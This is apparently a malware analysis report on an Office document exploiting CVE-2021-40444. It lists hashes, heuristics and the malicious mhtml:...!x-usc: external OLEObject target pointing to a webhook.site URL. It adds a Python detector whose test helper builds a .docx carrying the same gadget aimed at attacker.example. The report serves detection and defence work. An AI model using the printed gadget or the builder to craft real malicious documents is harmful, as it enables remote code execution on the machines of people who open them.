Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5823d05514a43cf1…

MALICIOUS

Office (OOXML)

Size: 1004.4 KB
Created: 2017-08-02 11:09:18 UTC
First seen: 2021-09-22

MD5: 6cca5e3de0dce2fc4e0e25076ceddcfd
SHA-1: f7b4ba1cd25eeb3ab16c4a51f75cd84e8e4d8915
SHA-256: 5823d05514a43cf17b30451efcc5869757505413d7e6b8668b92d3574e4ee7a8

Risk score: 142

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment

This Office document was flagged as malicious by ClamAV (Doc.Exploit.CVE-2021-40444-9891698-2). Its word/_rels/document.xml.rels part carries an external OLEObject relationship whose target uses the mhtml:...!x-usc: form, the loader pattern for CVE-2021-40444 (MSHTML remote code execution): when the document is opened outside Protected View, Word resolves that link and fetches attacker-controlled content from the listed URL. The specific URLs and indicators for this sample are listed in the indicators section.

Heuristics (4)

  • External OLEObject gadget, CVE-2021-40444 [critical] (rule: CVE_2021_40444, exact CVE match)
    External relationship to mhtml:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://we matches the external OLEObject gadget pattern used to exploit CVE-2021-40444.
  • ClamAV: Doc.Exploit.CVE-2021-40444-9891698-2 [critical] (rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware with signature Doc.Exploit.CVE-2021-40444-9891698-2.
  • External relationship [medium] (rule: OOXML_EXTERNAL_REL)
    External target in word/_rels/document.xml.rels: mhtml:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2
  • Embedded URL [info] (rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (channel: OOXML external relationship; these are the same relationship target with the mhtml: prefix stripped, rendered at different truncation lengths):
    • https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://we
    • https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46
    • https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2
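The heuristics above can be reproduced without a signature by parsing the OOXML package directly: list every relationship with TargetMode="External" (the OOXML_EXTERNAL_REL check), then raise the CVE_2021_40444 finding when an external relationship of type oleObject has an mhtml:...!x-usc: target and is actually referenced by an <o:OLEObject> in the document body. The following is an added example written for this page, not the scanner's own code; it constructs a minimal .docx in memory so it runs offline, and the host attacker.example is a placeholder, not an indicator from this report.

```python
"""Added example: rule-based detection of the CVE-2021-40444 external OLEObject gadget in a .docx."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
O_NS = "urn:schemas-microsoft-com:office:office"
OLE_REL_TYPE = R_NS + "/oleObject"
HYPERLINK_REL_TYPE = R_NS + "/hyperlink"

# mhtml: scheme with the x-usc: sub-locator is the loader pattern used by CVE-2021-40444 samples.
MHTML_GADGET = re.compile(r"^mhtml:.*!x-usc:", re.IGNORECASE)

# Constructed placeholder target in the gadget form (not an indicator from the report).
GADGET_URL = "mhtml:https://attacker.example/word.html!x-usc:https://attacker.example/word.html"


def external_relationships(zf):
    """Yield (rels_part, rId, rel_type, target) for every TargetMode="External" relationship."""
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("TargetMode", "Internal").lower() == "external":
                yield name, rel.get("Id"), rel.get("Type"), rel.get("Target", "")


def ole_object_rids(zf, part="word/document.xml"):
    """Return the r:id values referenced by <o:OLEObject> elements in the document body."""
    if part not in zf.namelist():
        return set()
    root = ET.fromstring(zf.read(part))
    return {el.get(f"{{{R_NS}}}id") for el in root.iter(f"{{{O_NS}}}OLEObject")}


def scan(docx_bytes):
    """Return findings as (rule, severity, detail) tuples mirroring the report's heuristics."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        referenced = ole_object_rids(zf)
        for rels_part, rid, rel_type, target in external_relationships(zf):
            findings.append(("OOXML_EXTERNAL_REL", "medium", f"{rels_part}: {target}"))
            if rel_type == OLE_REL_TYPE and MHTML_GADGET.match(target):
                # A dangling relationship (no OLEObject uses it) is still suspicious, but the
                # live gadget requires the body to reference the rId so Word resolves the link.
                severity = "critical" if rid in referenced else "high"
                findings.append(("CVE_2021_40444", severity, f"{rid} -> {target}"))
    return findings


def build_sample_docx(ole_target, reference_ole=True):
    """Construct a minimal .docx in memory: one benign hyperlink plus one external OLEObject link."""
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        "</Types>"
    )
    root_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{R_NS}/officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    )
    doc_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{HYPERLINK_REL_TYPE}" Target="https://example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="{ole_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    ole = (
        '<w:object><v:shape id="_x0000_i1025" style="width:1pt;height:1pt"/>'
        '<o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" '
        'ObjectID="_1" r:id="rId2" UpdateMode="OnCall"/></w:object>'
    ) if reference_ole else ""
    document = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        f'xmlns:r="{R_NS}" xmlns:o="{O_NS}" xmlns:v="urn:schemas-microsoft-com:vml">'
        f"<w:body><w:p><w:r>{ole}</w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for rule, severity, detail in scan(build_sample_docx(GADGET_URL)):
        print(f"[{severity:8}] {rule}: {detail}")
```

Run it against a real sample by replacing the constructed bytes with `open(path, "rb").read()`; the benign hyperlink still produces a medium OOXML_EXTERNAL_REL line, which is why the report treats an external relationship on its own as informational and reserves the critical rating for the oleObject/mhtml combination.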